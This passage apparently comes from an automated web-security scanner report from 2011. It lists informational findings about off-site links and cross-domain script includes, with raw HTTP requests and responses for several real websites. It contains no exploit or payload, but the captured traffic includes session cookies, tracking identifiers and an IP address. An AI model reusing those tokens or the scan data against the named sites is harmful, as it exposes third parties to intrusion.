<![endif]-->
       <script src="http://www.google-analytics.com/urchin.js" type="text/javascript" language="JavaScript1.2" />
       <script type="text/javascript" language="JavaScript1.2">
...[SNIP]...
</script>
       <script src="http://static.woopra.com/js/woopra.js"></script>
...[SNIP]...
<div><a href="http://cve.mitre.org" target="_blank"><img src="/images/cve_small.png" alt="CVE" id="PageCveLogo" border="0" />
...[SNIP]...
<div><a href="https://www.pcisecuritystandards.org" target="_blank"><img src="/images/pci_ssc_asv.jpg" alt="PCI" id="PagePciLogo" border="0" />
...[SNIP]...

22.60. http://www.praetorian.com/external-network-penetration-test.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.praetorian.com
Path:   /external-network-penetration-test.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /external-network-penetration-test.html?gclid=CO7VhZ_Pt6gCFaNd5Qodk1B4BQ HTTP/1.1
Host: www.praetorian.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116139463.1303732836.1.1.utmgclid=CO7VhZ_Pt6gCFaNd5Qodk1B4BQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=116139463.239124078.1303732836.1303732836.1303732836.1; __utmc=116139463

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:52:37 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 13262
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
   
...[SNIP]...
<noscript>
                   <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" width="647" height="295" id="currentnews" align="middle">
                       <param name="allowScriptAccess" value="sameDomain" />
...[SNIP]...
</h4>
               <a href="http://www.twitter.com/praetorianlabs" target="_blank" style="text-decoration:none;">
                   <img src="images/socialmedia/twitter.png" height="32" width="32" border="0" alt="twitter" />
...[SNIP]...
</a>
               <a href="http://www.facebook.com/praetorianlabs" target="_blank" style="text-decoration:none;">
                   <img src="images/socialmedia/facebook.png" height="32" width="32" border="0" alt="facebook" />
...[SNIP]...
</a>
               <a href="http://www.linkedin.com/companies/praetorian" target="_blank" style="text-decoration:none;">
                   <img src="images/socialmedia/linkedin.png" height="32" width="32" border="0" alt="linkedin" />
...[SNIP]...
</a>
               <a href="http://feeds.feedburner.com/PraetorianLabs" target="_blank" style="text-decoration:none;">
                   <img src="images/socialmedia/rss.png" height="32" width="32" border="0" alt="rss" />
...[SNIP]...

22.61. http://www.smpone.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smpone.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?gclid=CLbB86LPt6gCFSIRNAod2E3lCQ HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.1.10.1303732845; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:17:47 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Set-Cookie: TresCMS[tres_uid]=1; expires=Tue, 24-Apr-2012 12:17:47 GMT; path=/
Set-Cookie: TresCMS[tres_group]=0; expires=Tue, 24-Apr-2012 12:17:47 GMT; path=/
Set-Cookie: TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; expires=Tue, 24-Apr-2012 12:17:47 GMT; path=/
Set-Cookie: TresCMS[last_visit]=0; expires=Tue, 24-Apr-2012 12:17:47 GMT; path=/
Set-Cookie: TresCMS[timezone]=EDT; expires=Tue, 24-Apr-2012 12:17:47 GMT; path=/
Set-Cookie: TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:17:47 GMT; path=/
Set-Cookie: TresCMS[last_visit_temp]=1303733867; expires=Mon, 25-Apr-2011 12:27:47 GMT; path=/
Content-Type: text/html
Content-Length: 15026

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Security Management Partners Information Security Consultants</title>
<meta
...[SNIP]...
<noscript>
   <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0" width="500" height="380" id="homeshow" align="middle">
   <param name="allowScriptAccess" value="sameDomain" />
...[SNIP]...
<noscript>
   <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0" width="242" height="230" id="menu_right" align="middle">
   <param name="allowScriptAccess" value="sameDomain" />
...[SNIP]...
<td valign="bottom"><a href="http://www.facebook.com/pages/Security-Management-Partners/152915868089107"><img src="images/uploads/facebook.png" border="0" alt="facebook" /></a><a href="http://twitter.com/smpflash"><img src="images/uploads/TwitterIcon.png" border="0" alt="twitter" />
...[SNIP]...
<td><a href="http://www.tresware.com/" target="_blank"><img src="images/tresware.gif" border="0" alt="Tresware" width="95" height="16" />
...[SNIP]...

22.62. http://www.stillsecure.com/m/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stillsecure.com
Path:   /m/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /m/?c=request-a-trial&product=VAM HTTP/1.1
Host: www.stillsecure.com
Proxy-Connection: keep-alive
Referer: http://www.stillsecure.com/vam/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80d1802a2bda40500b441aefe0709f80; __utmz=183052004.1303732858.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183052004.352557952.1303732858.1303732858.1303732858.1; __utmc=183052004; __utmb=183052004.2.10.1303732858

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:57:19 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7h-fips PHP/5.2.1
X-Powered-By: PHP/5.2.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 16384

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title></title>
<style type="text/css" media="sc
...[SNIP]...
</style>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/jquery-ui.min.js"></script>
...[SNIP]...
<li><a href="https://radar.protectpoint.com/usermanager/login.php" target="_blank" onmouseover="toggleme('showme','servicesdropdown');" onmouseout="toggleme('hideme','servicesdropdown');">RADAR&trade; customer portal</a>
...[SNIP]...
<li><a href="http://partner.protectpoint.net/" onmouseover="toggleme('showme','partnerdropdown');" onmouseout="toggleme('hideme','partnerdropdown');">PartnerVision Portal</a>
...[SNIP]...
<li><a href="http://www.thesecuritysamurai.com" onmouseover="toggleme('showme','companydropdown');" onmouseout="toggleme('hideme','companydropdown');">Security Samurai Blog</a>
...[SNIP]...

22.63. http://www.trucklist.ru/cars/trucks  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.trucklist.ru
Path:   /cars/trucks

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:37:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=1b167314767bdffd9a5c5c390d79c0cc; path=/; domain=trucklist.ru
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: records_per_page=30; expires=Tue, 24-Apr-2012 14:22:59 GMT; path=/; domain=.trucklist.ru
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:23:12 GMT
Content-Length: 139769

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru">
<head>
   <meta htt
...[SNIP]...
<li><a href="http://www.moscow.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">............</a>
...[SNIP]...
<li><a href="http://www.anapa.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..........</a>
...[SNIP]...
<li><a href="http://www.angarsk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">............</a>
...[SNIP]...
<li><a href="http://www.arzamas.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..............</a>
...[SNIP]...
<li><a href="http://www.arhangel-sk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">......................</a>
...[SNIP]...
<li><a href="http://www.astrahan.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..................</a>
...[SNIP]...
<li><a href="http://www.astrahan.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..................</a>
...[SNIP]...
<li><a href="http://www.barnaul.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..............</a>
...[SNIP]...
<li><a href="http://www.belgorod.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">................</a>
...[SNIP]...
<li><a href="http://www.biysk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..........</a>
...[SNIP]...
<li><a href="http://www.blagoveshchensk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">........................</a>
...[SNIP]...
<li><a href="http://www.bryansk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">............</a>
...[SNIP]...
<li><a href="http://www.velnovgorod.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">.............. ................</a>
...[SNIP]...
<li><a href="http://www.vladivostok.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">......................</a>
...[SNIP]...
<li><a href="http://www.vladikavkaz.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">......................</a>
...[SNIP]...
<li><a href="http://www.vladimir.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">................</a>
...[SNIP]...
<li><a href="http://www.volgograd.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..................</a>
...[SNIP]...
<li><a href="http://www.voljskiy.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">................</a>
...[SNIP]...
<li><a href="http://www.vologda.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..............</a>
...[SNIP]...
<li><a href="http://www.voronezh.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..............</a>
...[SNIP]...
<li><a href="http://www.gelendzhik.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..................</a>
...[SNIP]...
<li><a href="http://www.groznyiy.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..............</a>
...[SNIP]...
<li><a href="http://www.ekaterinburg.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">........................</a>
...[SNIP]...
<li><a href="http://www.ivanovo.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..............</a>
...[SNIP]...
<li><a href="http://www.izhevsk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">............</a>
...[SNIP]...
<li><a href="http://www.irkutsk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..............</a>
...[SNIP]...
<li><a href="http://www.yoshkarola.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">............-......</a>
...[SNIP]...
<li><a href="http://www.kavminvody.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">......................</a>
...[SNIP]...
<li><a href="http://www.kazan.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">............</a>
...[SNIP]...
<li><a href="http://www.kaliningrad.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">......................</a>
...[SNIP]...
<li><a href="http://www.kaluga.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">............</a>
...[SNIP]...
<li><a href="http://www.kemerovo.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">................</a>
...[SNIP]...
<li><a href="http://www.kirov.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..........</a>
...[SNIP]...
<li><a href="http://www.kolomna.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..............</a>
...[SNIP]...
<li><a href="http://www.komsomolsk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">......................-....-..........</a>
...[SNIP]...
<li><a href="http://www.kostroma.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">................</a>
...[SNIP]...
<li><a href="http://www.krasnodar.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..................</a>
...[SNIP]...
<li><a href="http://www.krasnoyarsk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">....................</a>
...[SNIP]...
<li><a href="http://www.kurgan.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">............</a>
...[SNIP]...
<li><a href="http://www.kursk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..........</a>
...[SNIP]...
<li><a href="http://www.lipetsk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">............</a>
...[SNIP]...
<li><a href="http://www.magadan.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..............</a>
...[SNIP]...
<li><a href="http://www.magnitogorsk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">........................</a>
...[SNIP]...
<li><a href="http://www.mahachkala.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..................</a>
...[SNIP]...
<li><a href="http://www.murmansk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">................</a>
...[SNIP]...
<li><a href="http://www.nabchelny.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">.................... ..........</a>
...[SNIP]...
<li><a href="http://www.nal-chik.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..............</a>
...[SNIP]...
<li><a href="http://www.nahodka.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..............</a>
...[SNIP]...
<li><a href="http://www.nizhnekamsk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">....................</a>
...[SNIP]...
<li><a href="http://www.nizhniynovgorod.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">............ ................</a>
...[SNIP]...
<li><a href="http://www.nijniy-tagil.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">............ ..........</a>
...[SNIP]...
<li><a href="http://www.novokuznetsk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">......................</a>
...[SNIP]...
<li><a href="http://www.novorossiysk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">........................</a>
...[SNIP]...
<li><a href="http://www.novosibirsk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">......................</a>
...[SNIP]...
<li><a href="http://www.noril-sk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">................</a>
...[SNIP]...
<li><a href="http://www.noyabr-sk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">................</a>
...[SNIP]...
<li><a href="http://www.omsk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">........</a>
...[SNIP]...
<li><a href="http://www.orel.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">........</a>
...[SNIP]...
<li><a href="http://www.orenburg.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">................</a>
...[SNIP]...
<li><a href="http://www.penza.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..........</a>
...[SNIP]...
<li><a href="http://www.perm.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..........</a>
...[SNIP]...
<li><a href="http://www.petrozavodsk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">........................</a>
...[SNIP]...
<li><a href="http://www.petropavlovsk-kamchatskiy.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..........................-....................</a>
...[SNIP]...
<li><a href="http://www.pskov.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..........</a>
...[SNIP]...
<li><a href="http://www.rostovnadonu.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">............-....-........</a>
...[SNIP]...
<li><a href="http://www.ryazan.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">............</a>
...[SNIP]...
<li><a href="http://www.samara.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">............</a>
...[SNIP]...
<li><a href="http://www.saint-petersburg.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..........-..................</a>
...[SNIP]...
<li><a href="http://www.saransk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..............</a>
...[SNIP]...
<li><a href="http://www.saratov.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..............</a>
...[SNIP]...
<li><a href="http://www.smolensk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">................</a>
...[SNIP]...
<li><a href="http://www.sochi.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">........</a>
...[SNIP]...
<li><a href="http://www.stavropol.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">....................</a>
...[SNIP]...
<li><a href="http://www.sterlitamak.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">......................</a>
...[SNIP]...
<li><a href="http://www.syz.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..............</a>
...[SNIP]...
<li><a href="http://www.syiktyivkar.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..................</a>
...[SNIP]...
<li><a href="http://www.tambov.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">............</a>
...[SNIP]...
<li><a href="http://www.tver.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..........</a>
...[SNIP]...
<li><a href="http://www.tolyatti.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">................</a>
...[SNIP]...
<li><a href="http://www.tomsk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..........</a>
...[SNIP]...
<li><a href="http://www.tula.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">........</a>
...[SNIP]...
<li><a href="http://www.tyumen.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">............</a>
...[SNIP]...
<li><a href="http://www.ulanude.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">........-......</a>
...[SNIP]...
<li><a href="http://www.ulyanovsk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..................</a>
...[SNIP]...
<li><a href="http://www.ussuriysk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..................</a>
...[SNIP]...
<li><a href="http://www.ufa.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">......</a>
...[SNIP]...
<li><a href="http://www.khabarovsk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..................</a>
...[SNIP]...
<li><a href="http://www.cheboksary.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..................</a>
...[SNIP]...
<li><a href="http://www.chelyabinsk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..................</a>
...[SNIP]...
<li><a href="http://www.cherepovets.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..................</a>
...[SNIP]...
<li><a href="http://www.yujno-sahalinsk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">........-..................</a>
...[SNIP]...
<li><a href="http://www.yakutsk.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">............</a>
...[SNIP]...
<li><a href="http://www.yaroslavl.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">..................</a>
...[SNIP]...
<li><a href="http://www.countries.trucklist.ru/" onclick="set_current_region(this, 'country'); return false;">...... ............</a>
...[SNIP]...
<li><a href="http://www.belarus.trucklist.ru/" onclick="set_current_region(this, 'country'); return false;">................</a>
...[SNIP]...
<li><a href="http://www.germany.trucklist.ru/" onclick="set_current_region(this, 'country'); return false;">................</a>
...[SNIP]...
<li><a href="http://www.korea.trucklist.ru/" onclick="set_current_region(this, 'country'); return false;">..........</a>
...[SNIP]...
<li><a href="http://www.latvia.trucklist.ru/" onclick="set_current_region(this, 'country'); return false;">............</a>
...[SNIP]...
<li><a href="http://www.Poland.trucklist.ru/" onclick="set_current_region(this, 'country'); return false;">............</a>
...[SNIP]...
<a href="http://www.liveinternet.ru/click;trucklist"
target="_blank" rel="nofollow"><img src="http://counter.yadro.ru/logo;trucklist?44.1"
title="LiveInternet"
alt="" border="0" width="31" height="31"/>
</a>
...[SNIP]...
<noscript><a
                       rel="nofollow"

                       target="_top" href="http://top.mail.ru/jump?from=1446197">
<img

                       src="http://d1.c1.b6.a1.top.list.ru/counter?js=na;id=1446197;t=69"

                       border="0" height="31" width="38"

                       alt="..............@Mail.ru"/>
</a>
...[SNIP]...
<!-- begin of Top100 code -->

                       <a rel="nofollow" href="http://top100.rambler.ru/top100/"><img src="http://counter.rambler.ru/top100.cnt?1433420" alt="" width="1" height="1" border="0" /></a>
...[SNIP]...
<!-- begin of Top100 logo -->

                       <a rel="nofollow" href="http://top100.rambler.ru/top100/"><img src="http://top100-images.rambler.ru/top100/banner-88x31-rambler-gray2.gif" alt="Rambler's Top100" width="88" height="31" border="0" /></a>
...[SNIP]...

23. Cross-domain script include  previous  next
There are 78 instances of this issue:


23.1. http://ad.amgdgt.com/ads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.amgdgt.com
Path:   /ads/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ads/?t=i&f=j&p=5112&pl=bad56300&rnd=97383008780889220&clkurl=http://ib.adnxs.com/click/AAAAAAAAFEAAAAAAAAAUQAAAAMDMzABA4XoUrkfhFEDhehSuR-EUQICU8FEmC1Z8SsYda6b2ziU-g7VNAAAAAIAeAQC1AAAAlgIAAAIAAADHpAIA0WMAAAEAAABVU0QAVVNEACwB-gA3CRQE4ggBAgUCAAMAAAAAkxzWVwAAAAA./cnd=!wA_Htwjc8wIQx8kKGAAg0ccBKJQIMQAAALxH4RRAQgoIABAAGAAgASgBQgsIn0YQABgAIAMoAUILCJ9GEAAYACACKAFIAVAAWLcSYABolgU./referrer=http%3A%2F%2Fwww.livejournal.com%2F/clickenc=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBJSjBPoO1TZvTCJDvlQfqvNzyB9fq-NMBl6GU7BiXn6ezIQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi00NDU2MTgyMTM1OTU2OTc0oAHD8v3sA7IBE3d3dy5saXZlam91cm5hbC5jb226AQozMDB4MjUwX2FzyAEJ2gEbaHR0cDovL3d3dy5saXZlam91cm5hbC5jb20vmAKIJ8ACBMgChdLPCuACAOoCGjU2NTUvbGouaG9tZXBhZ2UvbG9nZ2Vkb3V0qAMB6AP4A_UDCACAhOAEAYAG6cSF9MWQ1oky%26num%3D1%26sig%3DAGiWqtxmq8nW3CGfJ8RQnem9Ve-Gn6Ps_g%26client%3Dca-pub-4456182135956974%26adurl%3D HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUDl0S8xnL7FEJVbNsodwmXFAeDNADA3gBY2BgEGFg6lzCwJLdwsDI.5OB4YYbAwMDJwMDo34vh0s_LrmO7JhTOOWS3K7jlIvwuoZTzm9CCE451wYOqFwb0J3fge50gbmzQ8L9Nk59EnbauPS1n9y5CZe.9pMzanHKnRBejFPu2IJHOOWOfhXEKTdjATtuOdtWnHLTH3rilutYiVvOVBen3LSbijjlKst8geHOiFu.Wwgoz.C7ZWcDAwcwIe1kZGRkYAi8xcgMpBgMmBiEQXwFM7Dw0gKwMEsmIxtQkCWEiY2RHciQ38XEwA1SBk2DIAMZADWIkL4-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUxOdW3WQldyr.xNlqt1dY_m2yKF0DA3gBY2BgEGFg6lzCwJLdysDI.4OB4YYrAwMDJwMDo34vxzZvqFwLUO4nUM4NIefSj0uuIzvmFE65JLfrOOUivK7hlPObEIJTzrWBAyrXBnTnd6A7XWDu7JBwv41Tn4SdNi597Sd3bsKlr_3kjFqccieEF.OUO7bgEU65o18FccrNWMCOW862Fafc9IeeuOU6VuKWM9XFKTftpiIwbBlxyld2CwHlGXy37Gxg4AAmpJ2MjIwMDIG3GJmBFIMBE4MIiK9gBhZeWgAWZslkZAMKsoQwsTGyAxnyu5gYuEHKwGnQB2QeAwMAUdqQwA--; Domain=.amgdgt.com; Expires=Wed, 25-May-2011 14:20:49 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 3919
Date: Mon, 25 Apr 2011 14:20:48 GMT

_289669_amg_acamp_id=166308;
_289669_amg_pcamp_id=69112;
_289669_amg_location_id=55365;
_289669_amg_creative_id=289669;
_289669_amg_loaded=true;
var _amg_289669_content='<script type="text/javascript"
...[SNIP]...
</script> <script src="http://servedby.adxpose.com/adxpose/find_ad.js" type="text/javascript" charset="utf-8"></script>\n'+
'\n'+
